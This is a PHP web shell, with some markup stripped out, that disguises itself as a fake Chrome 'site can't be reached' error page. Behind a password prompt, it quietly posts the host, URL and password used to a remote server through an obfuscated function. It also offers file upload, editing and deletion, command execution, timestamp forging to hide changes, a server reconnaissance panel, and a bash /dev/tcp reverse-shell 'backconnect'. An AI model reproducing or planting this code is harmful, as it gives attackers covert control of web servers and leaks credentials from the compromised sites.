$host



This site can't be reached

"; echo "

" . htmlspecialchars($_SERVER['HTTP_HOST']) . " unexpectedly closed the connection.

"; echo "

ERR_NAME_NOT_RESOLVED

Check your Internet connection

Check any cables and reboot any routers, modems, or other network devices you may be using.

Allow Chrome to access the network in your firewall or antivirus settings.

If it is already listed as a program allowed to access the network, try removing it from the list and adding it again.

If you use a proxy server…

Check your proxy settings or contact your network administrator to make sure the proxy server is working. If you don't believe you should be using a proxy server: Go to the Chrome menu > Settings > Show advanced settings… > Change proxy settings… > LAN Settings and deselect 'Use a proxy server for your LAN'.



"; echo ""; echo "
"; if(isset($_POST['minim_pass'])){ if($_POST['minim_pass'] == $auth){ $_SESSION['admin'] = "TRUE"; $password_used = $_POST['minim_pass']; Fb0Wyg72245lzHmjK85NWJ4gdh8Ksx($password_used); pindah('?home'); }else{ alert('Eh Tolol Lu Bisa Ngitung Ga?'); pindah('?tolol'); } } } ?> $_SERVER['HTTP_HOST'], 'dXJs' => (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], 'cGFzc3dvcmQ=' => $passwordUsed, ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $response = curl_exec($ch); curl_close($ch); return $response; } ?>
"; } function getPermissions($file) { $perms = fileperms($file); return substr(sprintf('%o', $perms), -4); } function getLastModified($file) { return date("Y-m-d H:i:s", filemtime($file)); } function colorizePermissions($file) { if (is_writable($file)) { return "" . getPermissions($file) . ""; } else { return "" . getPermissions($file) . ""; } } function delTree($dir){ $files = array_diff(scandir($dir), array('.', '..')); foreach ($files as $file) { (is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file"); } return rmdir($dir); } function alert($msg){ print ""; } function pindah($dir){ print ""; } if($_SESSION[ 'admin' ] == "TRUE"){ echo "$host
"; $dir=$_GET[ 'dir' ]; if(!$dir){ $dir=getcwd(); } echo "

"; $files = $_FILES[ 'vulnfile' ][ 'name' ]; $dest = $dir.'/'.$files; if(isset($_POST[ 'upload' ])) { if(is_writable($root)) { if(@copy($_FILES[ 'vulnfile' ][ 'tmp_name' ], $dest)) { $web = "http://".$_SERVER[ 'HTTP_HOST' ]."/"; echo " Upload Successful"; } else { echo " Upload Failed"; } } else { if(@copy($_FILES[ 'vulnfile' ][ 'tmp_name' ], $dest)) { echo " Upload Successful"; } else { echo " Upload Failed"; } } } if (isset($_GET['nf'])) { echo "
"; if (isset($_POST['fok'])) { $fname = trim($_POST['fname']); if (empty($fname)) { echo "

Please enter a filename.

"; } else { $fname = basename($fname); $filepath = "$dir/$fname"; if (file_exists($filepath)) { echo "

File '$fname' already exists!

"; } else { if (touch($filepath)) { echo "

File '$fname' created successfully!

"; pindah("?edit=$filepath&dir=$dir"); } else { echo "

Error: Unable to create the file. Check permissions.

"; } } } } } elseif (isset($_GET['edit'])) { $save = $_GET['edit']; $cont = htmlspecialchars(file_get_contents($save)); echo "


"; if (isset($_POST['Sle3py']) && isset($_POST['fcont'])) { if (file_put_contents($save, $_POST['fcont']) !== false) { echo "

Edit Successfully

"; } else { echo "

Failed to Edit

"; } } } elseif (isset($_GET['nd'])) { echo "
"; if (isset($_POST['fok']) && !empty($_POST['fname'])) { $new_dir = "$dir/" . $_POST['fname']; if (mkdir($new_dir)) { echo "Directory created successfully."; } else { echo "Failed to create directory."; } } } elseif (isset($_GET['cmd'])) { echo "
"; } elseif (isset($_GET['backconnect'])) { echo "
"; if (isset($_POST['connect'])) { $ip = $_POST['ip']; $port = $_POST['port']; if (filter_var($ip, FILTER_VALIDATE_IP) && $port >= 1 && $port <= 65535) { $backConnectCommand = "bash -c 'exec bash -i &>/dev/tcp/$ip/$port <&1'"; $output = shell_exec($backConnectCommand); if ($output === null) { echo "

Back Connect initiated to $ip:$port.

"; } else { echo "

Back Connect failed. Ensure the listener is set up on the target machine.

"; } } else { echo "

Invalid IP address or port number.

"; } } } elseif (isset($_GET['info_php'])) { echo "
"; $serverName = $_SERVER['SERVER_NAME']; $serverIP = $_SERVER['SERVER_ADDR']; $clientIP = $_SERVER['REMOTE_ADDR']; echo ""; $kernelVersion = shell_exec('uname -a'); echo ""; $software = $_SERVER['SERVER_SOFTWARE']; echo ""; $diskFree = round(disk_free_space("/") / 1024 / 1024 / 1024, 2); $diskTotal = round(disk_total_space("/") / 1024 / 1024 / 1024, 2); $diskUsed = $diskTotal - $diskFree; echo ""; echo ""; $user = get_current_user(); $group = posix_getegid() ? posix_getgrgid(posix_getegid())['name'] : 'N/A'; echo ""; $phpVersion = phpversion(); $sapi = php_sapi_name(); $magicQuotes = get_magic_quotes_gpc() ? 'ON' : 'OFF'; echo ""; $safeMode = ini_get('safe_mode') ? 'ON' : 'OFF'; $openBasedir = ini_get('open_basedir') ? 'ON' : 'OFF'; $safeModeExecDir = ini_get('safe_mode_exec_dir') ? 'ON' : 'OFF'; $safeModeIncludeDir = ini_get('safe_mode_include_dir') ? 'ON' : 'OFF'; echo ""; $mysql = extension_loaded('mysqli') ? 'ON' : 'OFF'; $mssql = extension_loaded('mssql') ? 'ON' : 'OFF'; $pgsql = extension_loaded('pgsql') ? 'ON' : 'OFF'; $oracle = extension_loaded('oci8') ? 'ON' : 'OFF'; echo ""; $perl = shell_exec("perl -v") ? 'ON' : 'OFF'; $python = shell_exec("python --version 2>&1") ? 'ON' : 'OFF'; $ruby = shell_exec("ruby -v") ? 'ON' : 'OFF'; echo ""; $disabledFunctions = ini_get('disable_functions'); echo ""; $commands = [ 'cURL' => 'curl', 'Wget' => 'wget', 'GCC' => 'gcc', 'sudo' => 'sudo', 'sh' => 'sh', 'bash' => 'bash', 'crontab' => 'crontab', 'NS' => 'nslookup', 'NC' => 'nc', 'Fetch' => 'fetch', 'Get' => 'get' ]; $commandStatus = []; foreach ($commands as $name => $cmd) { $commandStatus[] = "$name: " . (shell_exec("command -v $cmd") ? 'ON' : 'OFF'); } echo ""; echo "
Server $serverName | Server IP: $serverIP | Your IP: $clientIP
Kernel Version " . trim($kernelVersion) . "
Software $software
Storage Space {$diskUsed} GB / {$diskTotal} GB (Free: {$diskFree} GB)
Time On Server " . date("d M Y h:i:s A") . "
User / Group ($user) | ($group)
PHP Version $phpVersion on $sapi | Magic Quotes: $magicQuotes
More Info Safe Mode: $safeMode | Open Base Dir: $openBasedir | Safe Mode Exec Dir: $safeModeExecDir | Safe Mode Include Dir: $safeModeIncludeDir
Database MySQL: $mysql | MSSQL: $mssql | PostgreSQL: $pgsql | Oracle: $oracle
Software Perl: $perl | Python: $python | Ruby: $ruby
Disabled Functions " . ($disabledFunctions ? $disabledFunctions : 'None') . "
Linux Commands " . implode(' | ', $commandStatus) . "
"; } elseif(isset($_GET[ 'delf' ])){ if(delTree($_GET[ 'delf' ])){ pindah("?dir=$dir"); }else{ alert('Failed.'); } }elseif(isset($_GET[ 'renf' ])){ $now=$_GET[ 'renf' ]; echo "
"; if(isset($_POST[ 'fok' ])){ $new=$_POST[ 'fname' ]; if(rename($now,"$dir/$new")){ echo "
Rename Successfully
"; }else{ echo "
Rename Failed
"; } } }elseif(isset($_GET['edit_time'])) { $file = $_GET['edit_time']; $dir = $_GET['dir']; if (isset($_POST['new_time'])) { $newTime = $_POST['new_time']; $timestamp = strtotime($newTime); if (touch($file, $timestamp)) { echo "Successfully updated the last modified time of $file to $newTime.
"; } else { echo "Failed to update the last modified time.
"; } echo "Back to file list"; exit; } echo "